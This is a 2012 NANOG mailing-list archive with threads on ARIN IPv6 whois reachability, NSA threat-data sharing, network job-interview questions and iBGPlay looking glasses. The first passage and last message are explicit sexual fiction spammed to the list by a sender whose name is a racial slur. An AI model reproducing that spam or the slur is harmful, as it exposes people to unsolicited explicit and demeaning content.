don?t wanna be the small-chested one, you?re gonna have to be bigger than Jen. Of course, I don?t think she will want to be the smallest one either. Jen?s gotten pretty used to being the ?busty girl? around here.? Tasha rubbed her chin thoughtfully. ?This could get tricky. You better get a lot of that cream, Chris.? ?You might want to calm down a bit, Tasha,? Kimber counseled. ?He hasn?t even called his roommate yet. Don?t count your chickens before they hatch, or,? Kimber giggled, ?don?t measure your boobs before they grow.? ?What are you waiting on, Chris??, demanded an exasperated Tasha, looking at Chris fumbling around naked in the center of the room. ?I?m trying to figure out how to pick up my phone without bumping my dick into the furniture, or smacking it into my face! This isn?t easy, you know,? said Chris, gesturing at his thick, thirty inch long cock. ?I know. It looks really hard,? said Tasha, before she and Kimber collapsed, laughing. From jason at thebaughers.com Mon Jul 9 15:24:27 2012 From: jason at thebaughers.com (Jason Baugher) Date: Mon, 09 Jul 2012 15:24:27 -0500 Subject: Carrier assistance In-Reply-To: <1341864813.86295.YahooMailNeo@web142506.mail.bf1.yahoo.com> References: <1AA11A6BC714D944985F3BC7FF7AB35F64A5E78E2A@MBX03.corp.safesecureweb.com> <1341864813.86295.YahooMailNeo@web142506.mail.bf1.yahoo.com> Message-ID: <4FFB3DFB.9000502@thebaughers.com> What's with the porn lately? On 7/9/2012 3:13 PM, NIG NOG wrote: > > Diane spent a few more seconds over by the dresser before turning back around, condom in hand and already unwrapped. > From jgreco at ns.sol.net Mon Jul 9 14:27:18 2012 From: jgreco at ns.sol.net (Joe Greco) Date: Mon, 9 Jul 2012 14:27:18 -0500 (CDT) Subject: Carrier assistance In-Reply-To: <4FFB3DFB.9000502@thebaughers.com> Message-ID: <201207091927.q69JRJv4057207@aurora.sol.net> > What's with the porn lately? > > On 7/9/2012 3:13 PM, NIG NOG wrote: > > > > Diane spent a few more seconds over by the dresser before turning back around, condom in hand and already unwrapped. Probably someone trying to bring attention to the abuse problems Y! has lately. ... JG -- Joe Greco - sol.net Network Services - Milwaukee, WI - http://www.sol.net "We call it the 'one bite at the apple' rule. Give me one chance [and] then I won't contact you again." - Direct Marketing Ass'n position on e-mail spam(CNN) With 24 million small businesses in the US alone, that's way too many apples. From marine64 at gmail.com Mon Jul 9 16:07:54 2012 From: marine64 at gmail.com (Brian Henson) Date: Mon, 9 Jul 2012 17:07:54 -0400 Subject: Carrier assistance In-Reply-To: <201207091927.q69JRJv4057207@aurora.sol.net> References: <4FFB3DFB.9000502@thebaughers.com> <201207091927.q69JRJv4057207@aurora.sol.net> Message-ID: can we please ban his email from the list? On Mon, Jul 9, 2012 at 3:27 PM, Joe Greco wrote: > > What's with the porn lately? > > > > On 7/9/2012 3:13 PM, NIG NOG wrote: > > > > > > Diane spent a few more seconds over by the dresser before turning back > around, condom in hand and already unwrapped. > > Probably someone trying to bring attention to the abuse problems Y! > has lately. > > ... JG > -- > Joe Greco - sol.net Network Services - Milwaukee, WI - http://www.sol.net > "We call it the 'one bite at the apple' rule. Give me one chance [and] > then I > won't contact you again." - Direct Marketing Ass'n position on e-mail > spam(CNN) > With 24 million small businesses in the US alone, that's way too many > apples. > > From dhubbard at dino.hostasaurus.com Mon Jul 9 18:48:31 2012 From: dhubbard at dino.hostasaurus.com (David Hubbard) Date: Mon, 9 Jul 2012 19:48:31 -0400 Subject: arin ipv6 whois working for you? Message-ID: I want to make sure it's not just me but I'm not seeing a bgp route from my upstreams to networks with the addresses they're advertising: ;; ANSWER SECTION: whois.arin.net. 274 IN AAAA 2001:500:13::48 whois.arin.net. 274 IN AAAA 2001:500:13::46 whois.arin.net. 274 IN AAAA 2001:500:13::47 Thanks, Dave From ops.lists at gmail.com Mon Jul 9 19:00:34 2012 From: ops.lists at gmail.com (Suresh Ramasubramanian) Date: Tue, 10 Jul 2012 05:30:34 +0530 Subject: arin ipv6 whois working for you? In-Reply-To: References: Message-ID: works for me suresh at frodo 16:59:51 :~$ whois -h 2001:500:13::46 204.74.68.40 # # Query terms are ambiguous. The query is assumed to be: # "n 204.74.68.40" # # Use "?" to get help. # # # The following results may also be obtained via: # http://whois.arin.net/rest/nets;q=204.74.68.40?showDetails=true&showARIN=false&ext=netref2 # On Tue, Jul 10, 2012 at 5:18 AM, David Hubbard wrote: > I want to make sure it's not just me but I'm not > seeing a bgp route from my upstreams to networks > with the addresses they're advertising: > > ;; ANSWER SECTION: > whois.arin.net. 274 IN AAAA 2001:500:13::48 > whois.arin.net. 274 IN AAAA 2001:500:13::46 > whois.arin.net. 274 IN AAAA 2001:500:13::47 -- Suresh Ramasubramanian (ops.lists at gmail.com) From dhubbard at dino.hostasaurus.com Mon Jul 9 19:16:31 2012 From: dhubbard at dino.hostasaurus.com (David Hubbard) Date: Mon, 9 Jul 2012 20:16:31 -0400 Subject: arin ipv6 whois working for you? References: Message-ID: Sorry, dumb internal route filter issue; problem resolved. :-) David > -----Original Message----- > From: Suresh Ramasubramanian [mailto:ops.lists at gmail.com] > Sent: Monday, July 09, 2012 8:01 PM > To: David Hubbard > Cc: nanog at nanog.org > Subject: Re: arin ipv6 whois working for you? > > works for me > > suresh at frodo 16:59:51 :~$ whois -h 2001:500:13::46 204.74.68.40 > # > # Query terms are ambiguous. The query is assumed to be: > # "n 204.74.68.40" > # > # Use "?" to get help. > # > > # > # The following results may also be obtained via: > # > http://whois.arin.net/rest/nets;q=204.74.68.40?showDetails=tru > e&showARIN=false&ext=netref2 > # > > > > On Tue, Jul 10, 2012 at 5:18 AM, David Hubbard > wrote: > > I want to make sure it's not just me but I'm not > > seeing a bgp route from my upstreams to networks > > with the addresses they're advertising: > > > > ;; ANSWER SECTION: > > whois.arin.net. 274 IN AAAA 2001:500:13::48 > > whois.arin.net. 274 IN AAAA 2001:500:13::46 > > whois.arin.net. 274 IN AAAA 2001:500:13::47 > > > > -- > Suresh Ramasubramanian (ops.lists at gmail.com) > > From owen at delong.com Mon Jul 9 19:29:09 2012 From: owen at delong.com (Owen DeLong) Date: Mon, 9 Jul 2012 17:29:09 -0700 Subject: arin ipv6 whois working for you? In-Reply-To: References: Message-ID: I see routes there just fine and can reach the servers from Hurricane Electric (AS6939) and from home (AS1734). Owen On Jul 9, 2012, at 4:48 PM, David Hubbard wrote: > I want to make sure it's not just me but I'm not > seeing a bgp route from my upstreams to networks > with the addresses they're advertising: > > ;; ANSWER SECTION: > whois.arin.net. 274 IN AAAA 2001:500:13::48 > whois.arin.net. 274 IN AAAA 2001:500:13::46 > whois.arin.net. 274 IN AAAA 2001:500:13::47 > > Thanks, > > Dave From william.allen.simpson at gmail.com Mon Jul 9 20:46:51 2012 From: william.allen.simpson at gmail.com (William Allen Simpson) Date: Mon, 09 Jul 2012 21:46:51 -0400 Subject: U.S. spy agencies ... email for cybersecurity Message-ID: <4FFB898B.2000908@gmail.com> Somebody needs to give them a clue-by-four. The private sector already has the "Internet address where an email ... originated"; it's already in the Received lines. We don't need to be informed about it, we already inform each other about it. And it's already delivered "at network speed." It is my understanding the Dept of Homeland Security already cooperates in sharing government intrusion information. We certainly don't need a "U.S. spy agency" MITM to "protect the private sector." Moreover, the US is the source of most spam and malware, so the NSA isn't really going to be much help. And the US is the source of the only known cyber attacks on other country's infrastructure, so it's not likely much help there, either. Unless they expect retaliation? === http://in.reuters.com/article/2012/07/10/net-us-usa-security-cyber-idINBRE86901620120710 U.S. spy agencies say won't read Americans' email for cybersecurity 8:48pm EDT By Tabassum Zakaria and David Alexander WASHINGTON (Reuters) - The head of the U.S. spy agency that eavesdrops on electronic communications overseas sought on Monday to reassure Americans that the National Security Agency would not read their personal email if a new cybersecurity law was enacted to allow private companies to share information with the government. ... But to help protect the private sector, he said it was important that the intelligence agency be able to inform them about the type of malicious software and other cyber intrusions it is seeing and hear from companies about what they see breaching the protective measures on their computer networks. "It doesn't require the government to read their mail or your mail to do that. It requires them, the Internet service provider or that company, to tell us that that type of event is going on at this time. And it has to be at network speed if you're going to stop it," Alexander said. He said the information the government was seeking was the Internet address where an email containing malicious software originated and where it traveled to, not the content of the email. ... But the U.S. government is also concerned about the possibility of a cyber attack from adversaries on critical infrastructure such as the power grid or transportation systems. From ops.lists at gmail.com Mon Jul 9 22:17:19 2012 From: ops.lists at gmail.com (Suresh Ramasubramanian) Date: Tue, 10 Jul 2012 08:47:19 +0530 Subject: U.S. spy agencies ... email for cybersecurity In-Reply-To: <4FFB898B.2000908@gmail.com> References: <4FFB898B.2000908@gmail.com> Message-ID: I think what Gen.Alexander said and what the reporter missed out is that they're interested in malware traffic flows, bot C&Cs etc, rather than smtp received headers > He said the information the government was seeking was the Internet > address where an email containing malicious software originated and > where it traveled to, not the content of the email. --srs On Tue, Jul 10, 2012 at 7:16 AM, William Allen Simpson wrote: > Somebody needs to give them a clue-by-four. The private sector > already has the "Internet address where an email ... originated"; > it's already in the Received lines. We don't need to be informed > about it, we already inform each other about it. -- Suresh Ramasubramanian (ops.lists at gmail.com) From morrowc.lists at gmail.com Mon Jul 9 22:22:30 2012 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Mon, 9 Jul 2012 23:22:30 -0400 Subject: U.S. spy agencies ... email for cybersecurity In-Reply-To: <4FFB898B.2000908@gmail.com> References: <4FFB898B.2000908@gmail.com> Message-ID: (note, people ought to: 1) think about this on their own making up their own minds, 2) understand that the press has some very weird ideas, 3) take some better protections on their own, for their own security) also, I'm not judging the OP nor the reporter nor the ideas espoused in the article/clips... On Mon, Jul 9, 2012 at 9:46 PM, William Allen Simpson wrote: > Somebody needs to give them a clue-by-four. ?The private sector people keep trying, sometimes it's helped. sometimes reporters need to sell stories :( > already has the "Internet address where an email ... originated"; it's not just email they care about :( (you knew that I think) > it's already in the Received lines. ?We don't need to be informed > about it, we already inform each other about it. one interesting idea, that has proven out some merit over the years is the ability to share 'incident' data across entry points (say across companies, or gov'ts even) about 'bad things' that are happening. Take the case of 'spam came in from this end system to my mailserver', if I tell you that (or some central system that which you can query) you'll learn that maybe the inbound connection to you is also spam-rich. > And it's already delivered "at network speed." > the article sort of reads like the above scenario though... maybe it's NOT that, maybe it's something else entirely... it SEEMS that the gov't wants to help. They may be able to, they may just foul things up. The reporter certainly didn't leave enough details in place to tell :( > It is my understanding the Dept of Homeland Security already > cooperates in sharing government intrusion information. ?We certainly > don't need a "U.S. spy agency" MITM to "protect the private sector." you may mean? could be... the wikipedias are sometimes wrong, or so says the teacher of my 7yr old. > Moreover, the US is the source of most spam and malware, so the NSA > isn't really going to be much help. ?And the US is the source of the but hosts in the US that are botted/spamming, also spam/bot other things outside the US, right? so really who cares where the src is, get some data collection points up and use that data to inform your security policy, no? (sure, you'll have to have some smarts, and some smart people, and be cautious... but you'd do that anyway, right? :) ) These folks have some awesome tech for that sort of data collection and analysis: it's a shame that their parent company can't find a way to monetize that sort of thing. (the article there talks about some older version of the system, which is still alive/well today doing fraud detection and was doing some IDS/anomaly-detection-like work as well for ip network things) > only known cyber attacks on other country's infrastructure, so it's > not likely much help there, either. ?Unless they expect retaliation? > > === > > http://in.reuters.com/article/2012/07/10/net-us-usa-security-cyber-idINBRE86901620120710 > > U.S. spy agencies say won't read Americans' email for cybersecurity > 8:48pm EDT > > By Tabassum Zakaria and David Alexander > > WASHINGTON (Reuters) - The head of the U.S. spy agency that eavesdrops on > electronic communications overseas sought on Monday to reassure Americans > that the National Security Agency would not read their personal email if > a new cybersecurity law was enacted to allow private companies to share > information with the government. > ... > > But to help protect the private sector, he said it was important that the > intelligence agency be able to inform them about the type of malicious translated: "Hey, what if we could tell our private sector partners (Lockheed-Martin, for instance) that they should be on the lookout for things like X, or traffic destined to Y, or people sending all their DNS queries to these 5 netblocks." (dcwg.org sorta crap) that doesn't sound 'bad', it sounds like there is a gap in the business world to wrap all this data up and sell access to it... but the gov't can jump in with their mountains of data from their 'einstein' or whatever and go to town protecting their 'partners' who have often close interactions with the gov't, right? > software and other cyber intrusions it is seeing and hear from companies > about what they see breaching the protective measures on their computer > networks. adding to the above: "What if we had an API such that you could feed your collected alarm/alert/badness data to us as well? and we could feed that back into our system, protect ourselves AND send it back out to the other partners?" again, that's not that bad, really it sounds pretty cool... only if MCI could have found a way to productize and monetize that... which we built for them too :( but I digress. > "It doesn't require the government to read their mail or your mail to do > that. It requires them, the Internet service provider or that company, to > tell us that that type of event is going on at this time. And it has to be > at network speed if you're going to stop it," Alexander said. alexander is loose with his pronouns, which makes this worse... in reality: "send your alarm data to our system, hurrah!", PROBABLY this could include large ISP people if the pricing (or regulatory world were right), these folks COULD of course limit that to 'business isp traffic only', maybe. this sounds a little less on the ball though, so I'll blame bad reporter-translation, and hope that Alexander really meant: "Our partners in the industry, who help supply us and build our widgets for us, would be enabled to send data into our API..." > > He said the information the government was seeking was the Internet > address where an email containing malicious software originated and > where it traveled to, not the content of the email. I'm sure this was simply an example... and the reporter jumped on it like a carnivore, poor job reporter! :( > ... > > But the U.S. government is also concerned about the possibility of a cyber > attack from adversaries on critical infrastructure such as the power grid or > transportation systems. yes, put in the boogie-man! also, keep in mind that CI things are ... in a horrid state, and as it turns out the folk running it are ostriches :( -chris From jeffshultz at wvi.com Mon Jul 9 23:18:57 2012 From: jeffshultz at wvi.com (Jeff Shultz) Date: Mon, 09 Jul 2012 21:18:57 -0700 Subject: U.S. spy agencies ... email for cybersecurity Message-ID: One thing that GEN Alexander has is a clue. He was my Battalion Commander in Germany in the early 90s and he is one of those guys you don't give a second thought to following. Very competent. From jeroen at mompl.net Mon Jul 9 23:35:22 2012 From: jeroen at mompl.net (Jeroen van Aart) Date: Mon, 09 Jul 2012 21:35:22 -0700 Subject: job screening question In-Reply-To: References: Message-ID: <4FFBB10A.2020508@mompl.net> William Herrin wrote: > This is, incidentally, is a detail I'd love for one of the candidates > to offer in response to that question. Bonus points if you discuss MSS > clamping and RFC 4821. > > The less precise answer, path MTU discovery breaks, is just fine. I would say that the ability to quickly understand, troubleshoot and find a solution to a problem (and document it) is a far better skill to have than having ready made answers to interview questions learned by heart. It should take a skilled person less than 30 minutes to find the answer to that question and understand it too. The importance of knowing many things by heart has become incredibly moot. Greetings, Jeroen -- Earthquake Magnitude: 4.4 Date: Tuesday, July 10, 2012 04:06:53 UTC Location: Central Alaska Latitude: 63.4533; Longitude: -149.4308 Depth: 110.60 km From ag4ve.us at gmail.com Tue Jul 10 02:32:21 2012 From: ag4ve.us at gmail.com (shawn wilson) Date: Tue, 10 Jul 2012 03:32:21 -0400 Subject: U.S. spy agencies ... email for cybersecurity In-Reply-To: References: <4FFB898B.2000908@gmail.com> Message-ID: On Mon, Jul 9, 2012 at 11:22 PM, Christopher Morrow wrote: >> But to help protect the private sector, he said it was important that the >> intelligence agency be able to inform them about the type of malicious > > translated: "Hey, what if we could tell our private sector partners > (Lockheed-Martin, for instance) that they should be on the lookout for > things like X, or traffic destined to Y, or people sending all their > DNS queries to these 5 netblocks." (dcwg.org sorta crap) > or, lets take a real example - rsa gets compromised and a third of the authentication tons (most?) of government agencies were using is all of a sudden vulnerable (possibly more than that if you consider that rsa could've lost classified technology). rsa has to realize the threat and can take their time to disclose what they want to disclose. i think if i were in the power to fix that, i would *try* :) ie, i highly doubt a massively scaled system has a chance at detecting most apt. also, i don't really like the idea that someone might be monitoring my activities (who watches the watchers). however, if i were in the position of acquiring data about threats, i think i'd try to suck in as much data as i had the processing power to manage. From goemon at anime.net Tue Jul 10 02:32:21 2012 From: goemon at anime.net (goemon at anime.net) Date: Tue, 10 Jul 2012 00:32:21 -0700 (PDT) Subject: job screening question In-Reply-To: <4FFBB10A.2020508@mompl.net> References: <4FFBB10A.2020508@mompl.net> Message-ID: On Mon, 9 Jul 2012, Jeroen van Aart wrote: > William Herrin wrote: >> This is, incidentally, is a detail I'd love for one of the candidates >> to offer in response to that question. Bonus points if you discuss MSS >> clamping and RFC 4821. >> >> The less precise answer, path MTU discovery breaks, is just fine. > I would say that the ability to quickly understand, troubleshoot and find a > solution to a problem (and document it) is a far better skill to have than > having ready made answers to interview questions learned by heart. > > It should take a skilled person less than 30 minutes to find the answer to > that question and understand it too. The importance of knowing many things by > heart has become incredibly moot. If you are applying for a network position, you better know the *basics*. Having to look up the basics is not a good sign. Do you really want to hire someone who is going to have to look up basic networking concepts for 30 minutes every time they are in a meeting and asked a question? -Dan From bclark at spectraaccess.com Tue Jul 10 05:56:04 2012 From: bclark at spectraaccess.com (Bret Clark) Date: Tue, 10 Jul 2012 06:56:04 -0400 Subject: job screening question In-Reply-To: References: <4FFBB10A.2020508@mompl.net> Message-ID: <4FFC0A44.9050800@spectraaccess.com> On 07/10/2012 03:32 AM, goemon at anime.net wrote: > On Mon, 9 Jul 2012, Jeroen van Aart wrote: >> William Herrin wrote: >>> This is, incidentally, is a detail I'd love for one of the candidates >>> to offer in response to that question. Bonus points if you discuss MSS >>> clamping and RFC 4821. >>> >>> The less precise answer, path MTU discovery breaks, is just fine. >> I would say that the ability to quickly understand, troubleshoot and find a >> solution to a problem (and document it) is a far better skill to have than >> having ready made answers to interview questions learned by heart. >> >> It should take a skilled person less than 30 minutes to find the answer to >> that question and understand it too. The importance of knowing many things by >> heart has become incredibly moot. > If you are applying for a network position, you better know the *basics*. > Having to look up the basics is not a good sign. > > Do you really want to hire someone who is going to have to look up basic > networking concepts for 30 minutes every time they are in a meeting and > asked a question? > > -Dan > Hence the reason he mentioned "skilled" person... From david at davidcoulson.net Tue Jul 10 06:05:34 2012 From: david at davidcoulson.net (David Coulson) Date: Tue, 10 Jul 2012 07:05:34 -0400 Subject: job screening question In-Reply-To: <4FFC0A44.9050800@spectraaccess.com> References: <4FFBB10A.2020508@mompl.net> <4FFC0A44.9050800@spectraaccess.com> Message-ID: <4FFC0C7E.6060103@davidcoulson.net> On 7/10/12 6:56 AM, Bret Clark wrote: > > Hence the reason he mentioned "skilled" person... > Right. A skilled person knows not to commit to anything in a meeting, or to at least validate what they think before they open their mouth. Depends on the audience, of course. At least in my environment, there is not an expectation for someone to be able to rattle off technical specifics from memory on demand - I've got an iPad and Google for that. General concepts and functionality/limitations/whatever are great in that setting, but no one asks for the level of detail that takes 30 minutes to research and digest in a meeting. The ability to remember obscure command line arguments, or parts of a protocol header don't have much value, when you can look it about 10 seconds. Anyone else noticed their memory has gotten worse since Google came along? :) David From bjorn at mork.no Tue Jul 10 06:24:58 2012 From: bjorn at mork.no (=?utf-8?Q?Bj=C3=B8rn_Mork?=) Date: Tue, 10 Jul 2012 13:24:58 +0200 Subject: job screening question In-Reply-To: <4FFC0C7E.6060103@davidcoulson.net> (David Coulson's message of "Tue, 10 Jul 2012 07:05:34 -0400") References: <4FFBB10A.2020508@mompl.net> <4FFC0A44.9050800@spectraaccess.com> <4FFC0C7E.6060103@davidcoulson.net> Message-ID: <87pq83hn91.fsf@nemi.mork.no> David Coulson writes: > Anyone else noticed their memory has gotten worse since Google came > along? :) Huh? Hasn't Google always been there? Bj?rn From andriy.bilous at gmail.com Tue Jul 10 07:05:49 2012 From: andriy.bilous at gmail.com (Andriy Bilous) Date: Tue, 10 Jul 2012 14:05:49 +0200 Subject: job screening question In-Reply-To: <4FFC0C7E.6060103@davidcoulson.net> References: <4FFBB10A.2020508@mompl.net> <4FFC0A44.9050800@spectraaccess.com> <4FFC0C7E.6060103@davidcoulson.net> Message-ID: I think Ivan covered that http://blog.ioshints.info/2012/03/knowledge-and-complexity.html And also about hiring in general http://blog.ioshints.info/2009/12/certifications-and-hiring-process.html Many says that everything happens in the first 5 minutes of interview, right chemistry if you like - the rest of the hiring process you're looking for reasons to hire the person you like or for the reasons to reject someone you don't like. On Tue, Jul 10, 2012 at 1:05 PM, David Coulson wrote: > > On 7/10/12 6:56 AM, Bret Clark wrote: >> >> >> Hence the reason he mentioned "skilled" person... >> > > Right. A skilled person knows not to commit to anything in a meeting, or to > at least validate what they think before they open their mouth. Depends on > the audience, of course. > > At least in my environment, there is not an expectation for someone to be > able to rattle off technical specifics from memory on demand - I've got an > iPad and Google for that. General concepts and > functionality/limitations/whatever are great in that setting, but no one > asks for the level of detail that takes 30 minutes to research and digest in > a meeting. The ability to remember obscure command line arguments, or parts > of a protocol header don't have much value, when you can look it about 10 > seconds. > > Anyone else noticed their memory has gotten worse since Google came along? > :) > > David > From jpmuga at tespok.co.ke Tue Jul 10 07:04:25 2012 From: jpmuga at tespok.co.ke (Joseph M. Owino ) Date: Tue, 10 Jul 2012 15:04:25 +0300 (EAT) Subject: HELP IN SETTING UP iBGPlay In-Reply-To: <248cb92a-124d-4f7a-8d2f-f8bfc5e9d9b9@MX-IX-NBO> Message-ID: hi, Anyone out there who can help in setting up iBGP looking glass for an IXP. We currently are running 2 route servers and and 2 switches, they all are Cisco equipment. We also have a working web server running on FreeBSD 8.0. Any help is highly appreciated. regards, Muga From randy at psg.com Tue Jul 10 08:44:04 2012 From: randy at psg.com (Randy Bush) Date: Tue, 10 Jul 2012 22:44:04 +0900 Subject: HELP IN SETTING UP iBGPlay In-Reply-To: References: <248cb92a-124d-4f7a-8d2f-f8bfc5e9d9b9@MX-IX-NBO> Message-ID: > Anyone out there who can help in setting up iBGP looking glass for an > IXP. i am confused. ibgp is internal to an isp. an ixp is external. but i am easily confused. randy From randy at psg.com Tue Jul 10 08:45:43 2012 From: randy at psg.com (Randy Bush) Date: Tue, 10 Jul 2012 22:45:43 +0900 Subject: HELP IN SETTING UP iBGPlay In-Reply-To: References: <248cb92a-124d-4f7a-8d2f-f8bfc5e9d9b9@MX-IX-NBO> Message-ID: oh, and all the bgp looking glasses i have surveyed basically sucked. they either brought in 42kg of dependencies, used naked telnet, or some other fatal flaw. if you already run rancid, you might look at the one there. randy From mike at mtcc.com Tue Jul 10 08:45:39 2012 From: mike at mtcc.com (Michael Thomas) Date: Tue, 10 Jul 2012 06:45:39 -0700 Subject: job screening question In-Reply-To: <4FFC0A44.9050800@spectraaccess.com> References: <4FFBB10A.2020508@mompl.net> <4FFC0A44.9050800@spectraaccess.com> Message-ID: <4FFC3203.1070906@mtcc.com> On 07/10/2012 03:56 AM, Bret Clark wrote: > On 07/10/2012 03:32 AM, goemon at anime.net wrote: >> On Mon, 9 Jul 2012, Jeroen van Aart wrote: >>> William Herrin wrote: >>>> This is, incidentally, is a detail I'd love for one of the candidates >>>> to offer in response to that question. Bonus points if you discuss MSS >>>> clamping and RFC 4821. >>>> >>>> The less precise answer, path MTU discovery breaks, is just fine. >>> I would say that the ability to quickly understand, troubleshoot and find a >>> solution to a problem (and document it) is a far better skill to have than >>> having ready made answers to interview questions learned by heart. >>> >>> It should take a skilled person less than 30 minutes to find the answer to >>> that question and understand it too. The importance of knowing many things by >>> heart has become incredibly moot. >> If you are applying for a network position, you better know the *basics*. >> Having to look up the basics is not a good sign. >> >> Do you really want to hire someone who is going to have to look up basic >> networking concepts for 30 minutes every time they are in a meeting and >> asked a question? >> >> -Dan >> > Hence the reason he mentioned "skilled" person... This all has to be tempered with the zeitgeist as what is "basic knowledge" now, will be "charming history" at some point. All of it. No, a vampire tap has nothing to do with Twilight. No, the difference between 74 and 54 series logic is not 20. All of us oldsters would do well to try to keep up with what's new and hip coming out of schools and grill them in an intelligent fashion. Better yet, let them teach you something which shows if they understand or whether they're just parroting stuff back. MIke From jpmuga at tespok.co.ke Tue Jul 10 09:26:39 2012 From: jpmuga at tespok.co.ke (Joseph M. Owino ) Date: Tue, 10 Jul 2012 17:26:39 +0300 (EAT) Subject: HELP IN SETTING UP iBGPlay In-Reply-To: Message-ID: <8c95d48d-036f-4d44-a32a-4e1a9c385078@MX-IX-NBO> Hey thanks, the iBGPlay is not for ibgp alone. Namex which is the IXP in italy has implemented the software. You should try the demo it is really good and informative. Anyway let me try the light weight http://wiki.version6.net/lg and see how it goes. ----- Original Message ----- From: "Randy Bush" To: "Joseph M. Owino" Cc: "North American Network Operators' Group" Sent: Tuesday, July 10, 2012 4:45:43 PM Subject: Re: HELP IN SETTING UP iBGPlay oh, and all the bgp looking glasses i have surveyed basically sucked. they either brought in 42kg of dependencies, used naked telnet, or some other fatal flaw. if you already run rancid, you might look at the one there. randy From morrowc.lists at gmail.com Tue Jul 10 09:33:43 2012 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Tue, 10 Jul 2012 10:33:43 -0400 Subject: U.S. spy agencies ... email for cybersecurity In-Reply-To: References: <4FFB898B.2000908@gmail.com> Message-ID: On Tue, Jul 10, 2012 at 3:32 AM, shawn wilson wrote: > On Mon, Jul 9, 2012 at 11:22 PM, Christopher Morrow > wrote: > > >>> But to help protect the private sector, he said it was important that the >>> intelligence agency be able to inform them about the type of malicious >> >> translated: "Hey, what if we could tell our private sector partners >> (Lockheed-Martin, for instance) that they should be on the lookout for >> things like X, or traffic destined to Y, or people sending all their >> DNS queries to these 5 netblocks." (dcwg.org sorta crap) >> > > or, lets take a real example - rsa gets compromised and a third of the > authentication tons (most?) of government agencies were using is all > of a sudden vulnerable (possibly more than that if you consider that > rsa could've lost classified technology). rsa has to realize the > threat and can take their time to disclose what they want to disclose. sure, this isn't really in line with the idea I was getting at, except that: "Hey, PRC located ips really might be using token-auth to login to your systems, w00t!" > i think if i were in the power to fix that, i would *try* :) ie, i > highly doubt a massively scaled system has a chance at detecting most > apt. it might not, but discounting/dealing with all the cruft that today takes up your ops-folks time easily/mechanically surely frees the mup to focus on the things that they REALLY need to pay attention to... Essentially, filter out the garbage, focus on the actual threats to your business. The shared data pool COULD do that. > also, i don't really like the idea that someone might be monitoring my > activities (who watches the watchers). however, if i were in the if you work for a corporation (in the US at least) ... the corporation already has been monitoring your activities, you signed (in almost all cases) a paper acknowledging that fact, w00t! > position of acquiring data about threats, i think i'd try to suck in > as much data as i had the processing power to manage. exactly... and if done right, the 'service in the cloud' (or whatever) that aggregates, can do some bunches of that processing for you. -chris From valdis.kletnieks at vt.edu Tue Jul 10 10:03:22 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Tue, 10 Jul 2012 11:03:22 -0400 Subject: U.S. spy agencies ... email for cybersecurity In-Reply-To: Your message of "Mon, 09 Jul 2012 21:46:51 -0400." <4FFB898B.2000908@gmail.com> References: <4FFB898B.2000908@gmail.com> Message-ID: <3850.1341932602@turing-police.cc.vt.edu> On Mon, 09 Jul 2012 21:46:51 -0400, William Allen Simpson said: > But to help protect the private sector, he said it was important that the > intelligence agency be able to inform them about the type of malicious > software and other cyber intrusions it is seeing and hear from companies > about what they see breaching the protective measures on their computer > networks. Back in the dark ages at the beginning of this millennium (L1on worm, anybody?), the guys at SANS created this thing called DShield. https://isc.sans.edu/about.html#history Just sayin'. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From ops.lists at gmail.com Tue Jul 10 10:13:06 2012 From: ops.lists at gmail.com (Suresh Ramasubramanian) Date: Tue, 10 Jul 2012 20:43:06 +0530 Subject: U.S. spy agencies ... email for cybersecurity In-Reply-To: <3850.1341932602@turing-police.cc.vt.edu> References: <4FFB898B.2000908@gmail.com> <3850.1341932602@turing-police.cc.vt.edu> Message-ID: On Tue, Jul 10, 2012 at 8:33 PM, wrote: > > Back in the dark ages at the beginning of this millennium (L1on worm, > anybody?), the guys at SANS created this thing called DShield. > > https://isc.sans.edu/about.html#history Sure. But if what Gen.Alexander says comes off - this looks like a US-CERT or other clearinghouse to handle sensitive data of all sorts (critical infrastructure attacks, sensitive data leaks / breaches etc) I can see where DShield - and various other players in similar, but heavily silo'd spaces - might coordinate with a neutral centralized clearinghouse. -- Suresh Ramasubramanian (ops.lists at gmail.com) From hhoffman at ip-solutions.net Tue Jul 10 10:25:31 2012 From: hhoffman at ip-solutions.net (Harry Hoffman) Date: Tue, 10 Jul 2012 11:25:31 -0400 Subject: U.S. spy agencies ... email for cybersecurity In-Reply-To: References: <4FFB898B.2000908@gmail.com> <3850.1341932602@turing-police.cc.vt.edu> Message-ID: <4FFC496B.7070004@ip-solutions.net> The government is already doing this via the ISACs. http://www.ren-isac.net/docs/charter.html Cheers, Harry On 07/10/2012 11:13 AM, Suresh Ramasubramanian wrote: > On Tue, Jul 10, 2012 at 8:33 PM, wrote: >> >> Back in the dark ages at the beginning of this millennium (L1on worm, >> anybody?), the guys at SANS created this thing called DShield. >> >> https://isc.sans.edu/about.html#history > > Sure. But if what Gen.Alexander says comes off - this looks like a > US-CERT or other clearinghouse to handle sensitive data of all sorts > (critical infrastructure attacks, sensitive data leaks / breaches etc) > > I can see where DShield - and various other players in similar, but > heavily silo'd spaces - might coordinate with a neutral centralized > clearinghouse. > From nanog195 at yahoo.com Tue Jul 10 10:44:28 2012 From: nanog195 at yahoo.com (NIG NOG) Date: Tue, 10 Jul 2012 08:44:28 -0700 (PDT) Subject: U.S. spy agencies ... email for cybersecurity In-Reply-To: References: <4FFB898B.2000908@gmail.com> <3850.1341932602@turing-police.cc.vt.edu> Message-ID: <1341935068.57518.YahooMailNeo@web142501.mail.bf1.yahoo.com> ?Come on! It?s time to play with the Wii!? Kimber dragged Chris to the middle balance board. ?Let?s do snowboarding first. That?s fun.? She let everyone get in position, and started the snowboarding game. At first, Chris felt a little clumsy. His massive, stuffed balls weighed heavily on his legs, and his thick, semi-erect dick, straining against his pants, made it feel like they were going to pull down at any moment.? As Tasha and Kimber snickered at his poor performance, Chris felt himself getting annoyed. I?ve never done this with a monster cock between my legs! It?s throwing me off balance! Chris sighed audibly and settled his feet as far apart as possible on the balance board. His mammoth nutsack swung heavily between his legs. It pulled the stretchy pants even lower on his body, exposing the base of his broad prick. Chris felt a bit self-conscious about that, but it felt so good to let his gargantuan ballsack brush against the fabric of his pants and against the sides of his thighs. He soon noticed another benefit. With both his colossal rod and his fat nuts between his legs, his center of gravity had shifted downward considerably. Once he relaxed and allowed his gargantuan manhood to sway freely, its huge weight counteracted his upper body motions, acting like some genital gyroscope. In no time, Chris was ?snowboarding? much better than he had ever done before, 